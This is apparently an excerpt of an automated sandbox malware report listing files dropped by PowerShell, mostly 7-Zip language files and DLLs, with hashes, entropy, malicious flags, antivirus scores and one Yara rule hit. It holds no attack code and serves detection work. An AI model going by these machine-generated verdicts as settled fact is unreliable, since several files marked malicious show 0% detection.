                                                                                                                                                          SHA-512:CC199E839E2CF24ABCD8B9685702732427295858976A038FDDF6E3691FD1A31BCAF9F1DBAC48E125E096D1A395DCABFB4ECBB02A6C5E7D6DEA67E44E21E69037
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Andrij Ilechko..; : Mokiy Mazaylo..; : Sergiy Gontaruk..; : Misha Padalka..; 15.02 : 2015-05-19 : Yurii Petrashko..;..;..;..;..;..;..0..7-Zip..Ukrainian..............401..OK...................&.....&....&....................&............440..... ... &........ ... ..&.............................&.. ........ .......&.. .......... .......&...................... ........, .. ....... ......... ........?..500..&......&.............&........&............&.............&..........540..&.................. .&.................. &.......&.............&................&...........&......... ........
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):311448
                                                                                                                                                          Entropy (8bit):6.60360129496697
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:e2Gk6wDaKov/5qrawOZI8uN0f/UVvN3MwdZFmiVFC+OEu:e2GkNo35qrawqmG/yM8PmiO+Ol
                                                                                                                                                          MD5:851C9E8CE9F94457CC36B66678F52494
                                                                                                                                                          SHA1:40ABD38C4843CE33052916904C86DF8AAB1F1713
                                                                                                                                                          SHA-256:0891EDB0CC1C0208AF2E4BC65D6B5A7160642F89FD4B4DC321F79D2B5DFC2DCC
                                                                                                                                                          SHA-512:CDF62A7F7BB7A6D511555C492932E9BCF18183C64D4107CD836DE1741F41AC304BD6ED553FD868B442EAF5DA33198E4900E670CD5AE180D534D2BD56B42D6664
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15167
                                                                                                                                                          Entropy (8bit):4.352884960736366
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:i7ggZifEX14nReON0sutg2s/Vk/A/n/pPqS:cYEF4nReON0sutg2suY/YS
                                                                                                                                                          MD5:7AFEDBD6E9EF3A4A2A99BC1BCB133605
                                                                                                                                                          SHA1:317D758DD9F65A6E320A4D45776A21ECB2AD60CC
                                                                                                                                                          SHA-256:2DD421A44AD779D961C951F01E7ABF4AC358C61CE26EA8311A0C902B4FC77CA3
                                                                                                                                                          SHA-512:48650BC3AC6C316AD6431B9DB3E49D76FD066F976FDD949A8DFDB194775B0E1C6EDA5ED99D2574C9D3C2781C6138E3BB3939C294894443EEC981C78377823AF5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 20.02 : 2020-10-21 : Shamsiddinov Zafar..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Uzbek-Cyrillic...........401........... ..............&....&.....&................&..... .......440........ &.......... &..........................&.......&..... ......&..... ............. .............. ..........?..500..&......&.............&.........&..............&..........&.......540..&.......&........ .......&......... .......&.........&.............&..... ..........&.......... ...............&.......... .............&.... ..........&...... ...........&......... .................&.............&............... ................
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9383
                                                                                                                                                          Entropy (8bit):5.080725632797468
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ijX9l/0gt5MpHB8zNq+cwKp/avDFxCg8FTO/7yWyTHGw:ijX9l/0gt5wh8zNq+cBVavDFE3cTyWyZ
                                                                                                                                                          MD5:3035144EEA3A382E39541B218A5D813A
                                                                                                                                                          SHA1:EB7A2F6306F7D2DED4CC88FB4CAB0F65558DB8B0
                                                                                                                                                          SHA-256:A310044DBC86E2441F0D50BB7D7DADB9879359B0C6CEB1FAF413A0459E07045B
                                                                                                                                                          SHA-512:99D86146E0A6407F8D0FD7179061699BC82232E6A2427203A2951FEF9089572C9C4E29C8484910F672A31F98EF13B5F3A45D5786FB118701A5B908F8F85A5C6A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 20.02 : 2020-10-20 : Shamsiddinov Zafar..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Uzbek..O.zbekcha..401..OK..Bekor qilmoq........&Ha..&Yo.q..&Yopmoq..Ko.mak....&Davom etmoq..440..Bariga &ha..Bariga &yo.q..To.xtatmoq..Qaytadan..&Fonda..&Fonda emas..&Pauza qilmoq..Pauza qilindi..Bekor qilinsinmi?..500..&Fayl..&Tahrirlamoq..&Ko.rinish..&Tanlanganlar..&Jihozlar..&Ko.mak..540..&Ochmoq..&Ichkarida ochmoq..&Tashqariga ochmoq..&Ko.rinish..&Tahrirlamoq..&Qayta nomlamoq..&Quyidagiga nusxalamoq.....&Quyidagiga ko.chirmoq.....&Olib tashlamoq..&Faylni bo.lmoq.....&Fayllarni birlashtirmoq.....&Xususiyatlar..&Sharh.....Yakuniy summa..Taqqoslamoq..Jild tuzmoq..Fayl tuzmoq..&Dasturdan chiqmoq..Havola..&Muqobil oqimlar..600..&Barini tanlamoq..Barini tanlamaslik..&Teskari tanlash..Tanlamoq.....Tanlamaslik.....Turi bo.yicha tanlamoq..Turi bo.yicha tanlamaslik..700..&Yirik ikonkalarda..&Kichik ikonkalarda..&Ro.yxatsimon..&Tafsilotli..730..Saralamaslik..Bejiri
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6549
                                                                                                                                                          Entropy (8bit):4.9932250796592506
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:icd/FL0HKwFgPqtXdN3K3TIcmqHfc39vNH:i65wCitzaj5E3P
                                                                                                                                                          MD5:639741F687D4427C9D3B170B1CED41A9
                                                                                                                                                          SHA1:AD3D3A09B8877381DF520E6EB654227DA045B89D
                                                                                                                                                          SHA-256:F43C31BD959A752EEFBB7C76ED918C4CACD50D43706121C55093D72A638FA7A5
                                                                                                                                                          SHA-512:EB63B0437624782D2BCD033905C7C0538902F9644E4FACDC52D094EDE5353309613B4EEF3CB437D4F69C2A4FD4B2E0F241990AAA3A38366685B10CABEC20A357
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4:26 : Tomas Miralles..; 4.44 : Fernando Verd...;..;..;..;..;..;..;..;..;..0..7-Zip..Valencian..Valenci...401..Acceptar..Cancel.lar........&Si..&No..Tan&car..Ajuda....&Continuar..440..Si a &tot..No a t&ot..Parar..Reiniciar..Segon pla..Primer pla..&Pausa..Parat..Est. segur que vol cancel.lar?..500..&Arxiu..&Editar..&Visualitzar..Favorits..Ferramentes..Ajuda..540..&Obrir..Obrir d&ins..Obrir fora..&Visualitzar..&Editar..Renom&enar..&Copiar a.....&Moure a.....&Suprimir..&Separar fitxer.....Com&binar fitxers.....P&ropietats..Come&ntari..Calcular checksum....Crear directori..Crear fitxer..Eixir..600..Seleccion&ar-ho tot..Deseleccionar-ho tot..&Invertir selecci...Seleccionar.....No seleccionar.....Seleccionar per tipus..No seleccionar per tipus..700..Icones g&rans..Icones menudes..&Llista..&Detalls..730..No ordenat..Vista plana..&2 Taules..&Barres de ferramentes..Obrir directori arrel..Directori pare..Historial de carpetes.....Actualitza&r..750..Arxiu..Est.ndar
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8515
                                                                                                                                                          Entropy (8bit):5.3853389717622
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iJg8VLjw6yLuVSjHohWCOMF65E0QS3CmJdH:iJg8VfVcHpN5/CA
                                                                                                                                                          MD5:044531D134ACA40D5E57CC0AB96B4940
                                                                                                                                                          SHA1:988AA2BB6922360C1977B97725175613266242D2
                                                                                                                                                          SHA-256:3A6DCA3E1B5C8190C81FC859B5BE83EAF54EFDCAA148F4374D1225381083406F
                                                                                                                                                          SHA-512:458A86EA6468E8B1C9CC98A7A579F74854A34F101EC2EDE3AB48DD7DFBBF75EEAE184C5A23443B3CCC69B8C06E0E09EF2DF04D9F00D86CE99B82E785F95B7635
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 2.30 : : Tran Hong Ha..; 4.42 : : Le Vu Hoang..; 4.48 : : Nguyen Hong Quan..; 9.07 : 2011-04-12 : Vietnamize Team..;..;..;..;..;..;..;..0..7-Zip..Vietnamese..Ti.ng Vi.t..401....ng ...H.y b.........C...Kh.ng....ng..Gi.p ......Ti.p t.c..440..C. t.t c...Kh.ng t.t c...D.ng..L.m l.i..Ch.y n.n..Ch. .. .u ti.n..D.ng.... d.ng..B.n ch.c ch.n mu.n h.y b.?..500..T.p tin..Bi.n t.p..Xem...a th.ch..C.ng c...Gi.p ....540..M...M. t.i ..y..M. trong c.a s. kh.c..Xem..Bi.n t.p....i t.n..Sao ch.p ..n.....Di chuy.n ..n.....Xo...Chia c.t t.p n.n.....N.i t.p n.n.....Thu.c t.nh..Ch. th.ch..T.nh checksum (md5)..So s.nh..T.o th. m.c..T.o t.p n.n..Tho.t..600..Ch.n t.t c...B. ch.n t.t c.....o l.a ch.n..Ch.n.....B. ch.n.....Ch.n theo lo.i..B. ch.n theo lo.i..700..Bi.u t..ng
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11044
                                                                                                                                                          Entropy (8bit):5.298636168430069
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:7XgmEsBVCxtNc/EcoGFGDbMOw3WmkmSAGplG0v6k6P89Y6QVkixHxXUE4zVG9uRt:7XgECxuGbMO3/J3PL9zyezVGw5
                                                                                                                                                          MD5:698AF9267C08D61B712417491DA6A3BB
                                                                                                                                                          SHA1:01F21CE60E571699B006098AFE9520C02D4E11DC
                                                                                                                                                          SHA-256:FFAB6B91FFD2D3C2B1F7F431B47F7D28AA17A11587B876565613BB26C173402B
                                                                                                                                                          SHA-512:D37F63D3824D12D9BD4749EA94FCE924F3A5469874D6777261F0570A2A7EF28574825FAE199408C0E1EEE7061B08C447DA8744A1C2FA486981165AB5062FC8A9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:;!@Lang2@!UTF-8!..; 15.00 : 2015-03-29 : Ibrahim Oyekan..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Yoruba..Yoruba..401..O DAA..Pa re........&B..ni..&B..k...&P.d....r.nl.w.....&T..-s.w.j...440..B..ni fun &gbogbo ...B..k. fun &gbogbo ...D.r.....t.nb..r.. ..&...h.n-.gb.h.n..&Oj.-.gb.h.n..&D.d.r....d.r....e . d.j. pe .nyin f.. paar...500..&Fa.li..&Tunk...&.w...&A.y...&Irin... ..&.r.nl.w...540..&.i...i &si .n....i &si .ta..&.w...&Tunk...&Tun oruk. k...&...d. si.....&Gb. si.....&Paar...&P.n fa.li....... .w.n fa.li k.p.......&.b.d...&.r. .w.ye......e i.iro checksum...y.t....D. .p. fa.li sil.. ..D. fa.li sil.. ..&P.d....t..kas. ..&Yiyan agbara d.t...600.....y.n &gbogbo fa.li..Paa ...y.n gbogbo fa.li..&Yi ...y.n Pad......y.n.....Paa ...y.n........y.n bi ir. fa.li..Paa ...y.n bi ir. fa.li
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7973
                                                                                                                                                          Entropy (8bit):5.983862504991157
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:7f+OUNnnvU5RLUvMyUxupow69yJ1L8ln9K4zy4VCrcj+v67DAT21ph4LiD:72rnnvU5R+yJ1MglEyycWV2DATk4LiD
                                                                                                                                                          MD5:0AAE98F500CE669DA6A4FCC33AEA04E9
                                                                                                                                                          SHA1:9326F529B796BCA164835FB1EB4E135F01CB61AF
                                                                                                                                                          SHA-256:7CF13E7434E6C062A29B964C026B2F66E75ECF541228665BF0C826EF7C0FE133
                                                                                                                                                          SHA-512:FC64FB4C2DF2B99F3D24CD938F4F381ACC20547BA655FB34016A1A1F860E0D8A99C087B24FDC160D2BD1DAD1F04C9EBBA682ADDE0E0004E0B64D774BD3F3550F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:;!@Lang2@!UTF-8!..; 2.30 : 2002-09-07 : Modern Tiger, kaZek, Hutu Li..; 3.08 : 2003-08-29 : Tunghsiao Liu..; 21.03 : 2021-07-21 : Tunghsiao Liu..;..;..;..;..;..;..;..;..0..7-Zip..Chinese Simplified........401.................(&Y)...(&N)....(&C)..........(&C)..440....(&A)....(&L)..............(&B)....(&F)....(&P).................500....(&F)....(&E)....(&V)....(&A)....(&T)....(&H)..540....(&O)........(&I)........(&U)....(&V)....(&E).....(&M).....(&C)........(&M).......(&D)......(&S).........(&B).......(&R)....(&N).............................(&X)...........(&A)..600....(&A)..........(&I)..........................................700.....(&G).....(&M)....(&L)....
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8058
                                                                                                                                                          Entropy (8bit):6.010295819104829
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i965RTllmRwM4cO+VnoF0HDczLXO7AJ8YRcaBxU+G9dDRI:i9MRTPUZO+VaoDcmRYUhXRI
                                                                                                                                                          MD5:ACFC57DE6B0E4489287BDAFE2062409A
                                                                                                                                                          SHA1:DBF62F8C6DD239AA16BFD62500517B849ED8E5B4
                                                                                                                                                          SHA-256:37C79297F8D4E491D681B556C23D957BC830068AE1D5F4535FD054C2233F3474
                                                                                                                                                          SHA-512:50A76A2C5A61056B2B9EFAF143335D86C5882D97C9D42ACF29CA87CD39D79876D561EC0FE83FB377E25379CFEBF593B782ECD8613D2A84AC33CBB6D8314481F1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.59 : Leon Tseng, sec2, ....; 9.07 - 15.00 : Jack Pang : http://www.developershome.com/7-zip/..;..;..;..;..;..;..;..;..;..0..7-Zip..Chinese Traditional........401.................(&Y)...(&N)....(&C)..........(&C)..440......(&A)......(&L)................(&B)......(&F)....(&P).............?..500....(&F)....(&E)....(&V)......(&A)....(&T)....(&H)..540....(&O).......(&I).......(&U)....(&V)....(&E)......(&M).....(&C)........(&M).......(&D)......(&S).........(&B).......(&R)....(&N)..............................(&X)...........(&A)..600....(&A)...........(&I).................................700.....(&G).....(&M)....(&L)......(&D)..730.
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):85309
                                                                                                                                                          Entropy (8bit):4.40078069686098
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:77eekfGGOl/TJGEFCxUZkmlhvaJ0eQ0NEwtQn3P:77/kl6/TJGUuUZ/kieQ0GwQ3P
                                                                                                                                                          MD5:9C93706B69D74E1581F72121B51BA165
                                                                                                                                                          SHA1:7FA9050B961309343CC7B928C5208B7590B6B1A7
                                                                                                                                                          SHA-256:C2EAE923EF7B68984AF9B76D81F53F9797D1BA56E361C6CEEC7728109D28B097
                                                                                                                                                          SHA-512:8DD402525EF0D2C093C09899471DB61507FE86CEF3A5C882668E6C8B55491217ECB3ACEA8A323E5AE796322B0F06411F58D47F375CDD773BC747D561659C08A5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):187399968
                                                                                                                                                          Entropy (8bit):0.08844724852506093
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:oOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOe:3
                                                                                                                                                          MD5:483C78697433D273FE559708EFFBE3DF
                                                                                                                                                          SHA1:89B044BF2A6A57BC93DAEA55D871DB1DD99D0BD5
                                                                                                                                                          SHA-256:C79C4E7F57BFA69DAC2BDAF6B074F39B68CFFC801E361B5564295B393F7C9374
                                                                                                                                                          SHA-512:E78CB2B136FAE43D5810D410984940E6BB6EDF9405B22F1C4C6271D7DE15E77056828EF01294201DB99EDCE3728BB0A0DCEA3E4A9CF4FF5605459B5122EAF135
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):264504
                                                                                                                                                          Entropy (8bit):4.2616300266171105
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0AC98A4BFC717523E344010A42C2F4BA
                                                                                                                                                          SHA1:7967769EE63B28FC8BEC14854A4A0A71BDA6B3F2
                                                                                                                                                          SHA-256:68546336232AA2BE277711AFA7C1F08ECD5FCC92CC182F90459F0C61FB39507F
                                                                                                                                                          SHA-512:8A5F4F19C24C24A43D9D18A8935613AD6A031B8F33D582767A2407665F1FF39A403DDAEECBF4F22A58759FCD53F81F4392192CA9FA784FF098A6C995509F9547
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):268600
                                                                                                                                                          Entropy (8bit):4.285774017645798
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:41C75E831A5571C3F72287794391A0E6
                                                                                                                                                          SHA1:0FE7A9A3C905D0376001A5C46EDFC0000FA82BD4
                                                                                                                                                          SHA-256:B3AD99AFDAEE3B9365E7A3FFCC44C2761E22A4F92DFF5E5EFDC52F6B08EA0105
                                                                                                                                                          SHA-512:D3D03F3308DB1862522127300127839AA44828D29622DB20AEA71E6A80A51247654E380D7A0126361D85774137826FC345AE368335BB1EA9C1C8995721DAF432
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1112040
                                                                                                                                                          Entropy (8bit):6.832491592471325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:ADF82ED333FB5567F8097C7235B0E17F
                                                                                                                                                          SHA1:E6CCAF016FC45EDCDADEB40DA64C207DDB33859F
                                                                                                                                                          SHA-256:D6DD7A4F46F2CFDE9C4EB9463B79D5FF90FC690DA14672BA1DA39708EE1B9B50
                                                                                                                                                          SHA-512:2253C7B51317A3B5734025B6C7639105DBC81C340703718D679A00C13D40DD74CCABA1F6D04B21EE440F19E82BA680AA4B2A6A75C618AED91BD85A132BE9FC92
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bpl, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):289568
                                                                                                                                                          Entropy (8bit):6.327940956070683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:2BCA4E2C047EC969CB3CFF277E7FC184
                                                                                                                                                          SHA1:C4B5B00B605E59C6FDCB6731F2E53069506E287A
                                                                                                                                                          SHA-256:F1EB582E607A1E43CDB1654BFB7CB29AD46F6728B3FB89A14F7727E0E8DAAB69
                                                                                                                                                          SHA-512:3819178EC650298157B1D67317E0895CB92709B106D0D8525921E341EBA5E960F42434E010066BB405F1BA1619ADFF1A645EDE58E16C4B2D88DF2C90611A6CB5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4249928
                                                                                                                                                          Entropy (8bit):6.705198671596974
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:3CF26CE759C5E261FE3ECC6451B8B08E
                                                                                                                                                          SHA1:B5DA110034FE394A4020367404534903764473FE
                                                                                                                                                          SHA-256:FC4A65FF603BF1F4BFE323DE1866145AE1E006AA656799FD134DFA63D92D47C1
                                                                                                                                                          SHA-512:E7B543483F38BB6338490B5C8F5DA6F95E0D78B45F2B26D898CC3B58CF7C359952BFE413414CB6CD1532C3C6FD7A860026B2BEC7B6D0DDFBEE9A1385A62E14F2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2015208
                                                                                                                                                          Entropy (8bit):6.68071457498688
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:A8638D9BCA7378BA33AD3E4F1555998D
                                                                                                                                                          SHA1:67670BABECA5CFEC1ABE45E01F66A19F13063CE6
                                                                                                                                                          SHA-256:8FE48F3E443A13D6D47EDF188FF5F12CBBDA662FF095027009D7F5A5A4B5EE99
                                                                                                                                                          SHA-512:B9902808FA40105C1C610494258F87207604D3933E40D2A31D64E37813BC4C83DC69094C9C1E6F69742F9CDAEA7250CFD9FB6D433C476BC89C5525ADD0ACD1B8
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18384
                                                                                                                                                          Entropy (8bit):7.060392296328683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:29001F316CCFC800E2246743DF9B15B3
                                                                                                                                                          SHA1:DC734266648D3463C1F8D88C1CE7D900A4E3B26C
                                                                                                                                                          SHA-256:E5EA2C21FB225090F7D0DB6C6990D67B1558D8E834E86513BC8BA7A43C4E7B36
                                                                                                                                                          SHA-512:4CFFC0C6F94FCD1155909993C622B9103ABD7A7BCE88742A10ABD6A3496A334D667A39BB601F99EB174AA847D7DAE056E0D9769754CA86320579B262A20A6599
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17360
                                                                                                                                                          Entropy (8bit):7.138145958834492
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6EE66DCA31C5CCE57740D677C85B4CE7
                                                                                                                                                          SHA1:8969DB03F98F9548CAF8E2D8C7F2F5CD7071F333
                                                                                                                                                          SHA-256:D00A0EDACE14715BF79DBD17B715D8A74A2300F0ADB1F3FC137EDFB7074C9B0A
                                                                                                                                                          SHA-512:592E3B6C689A0D6C87079C54C3E13E6EE1FC0C5C770ABC854040E85464687C46F0A558BE22F8759DBC4A100810386EE379FFE4359CF9091D9AFAE548BC597BE2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18384
                                                                                                                                                          Entropy (8bit):7.019765652631857
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0069FD29263C0DD90314C48BBCE852EF
                                                                                                                                                          SHA1:DFB99C850A69E67E85F0A0985659F325BD8F84FC
                                                                                                                                                          SHA-256:D11093FDC1D5C9213B9B2886CE91DB3DED17EF8DAE1615A8C7FFBC55B8E3F79B
                                                                                                                                                          SHA-512:71965E8DD2FD81D0C6DBA4DBEC8D2D1BFD4A644EF6BBA4F6027DE4BCDF9C07DA16F27F2156C21B52E678C75F0A93A4BCBC3E1942F0A73F1EEA5FF64B70662F70
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17872
                                                                                                                                                          Entropy (8bit):7.081667069114702
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:2E5C29FC652F432B89A1AFE187736C4D
                                                                                                                                                          SHA1:96F8480B9339411D5D8C94918E983523B1A55C56
                                                                                                                                                          SHA-256:3807DB7ACF1B40C797E4D4C14A12C3806346AE56B25E205E600BE3E635C18D4F
                                                                                                                                                          SHA-512:FE1135532E18127F2CFEFAAA4A19020D6C790374F648DC93383D58EE52B147D1451AF01B8624234BD5D77ABE2451EB3E15CBE72A19D283F00CF78C05C43041DF
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):19920
                                                                                                                                                          Entropy (8bit):6.982364402821961
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:979C67BA244E5328A1A2E588FF748E86
                                                                                                                                                          SHA1:4C709CE527550EB7534CB6362AFDB3623C98254E
                                                                                                                                                          SHA-256:8BB38A7A59FBAA792B3D5F34F94580429588C8C592929CBD307AFD5579762ABC
                                                                                                                                                          SHA-512:49F3C3319AA462B445C6A0B816E10034F6E5A9CF1250EA30B348CFA1EF71525E9F62E2F13253F61375F51FC574847DE0D509CFFA95103771BE356327D5FEF90D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18384
                                                                                                                                                          Entropy (8bit):7.088266400086267
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:659E4FEBC208545A2E23C0C8B881A30D
                                                                                                                                                          SHA1:11B890CC05C1E7C95F59EDA4BB8CE8BC12B81591
                                                                                                                                                          SHA-256:9AC63682E03D55A5D18405D336634AF080DD0003B565D12A39D6D71AAA989F48
                                                                                                                                                          SHA-512:010AB6D3971FABD2A956F891B8D9D20EF487E722443B2882A1A329830DC5C80D262E03A844CD3F5C3E4EFCFBAD72B9E1FBBF7D9DC6CF85ED034D84726946CE07
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
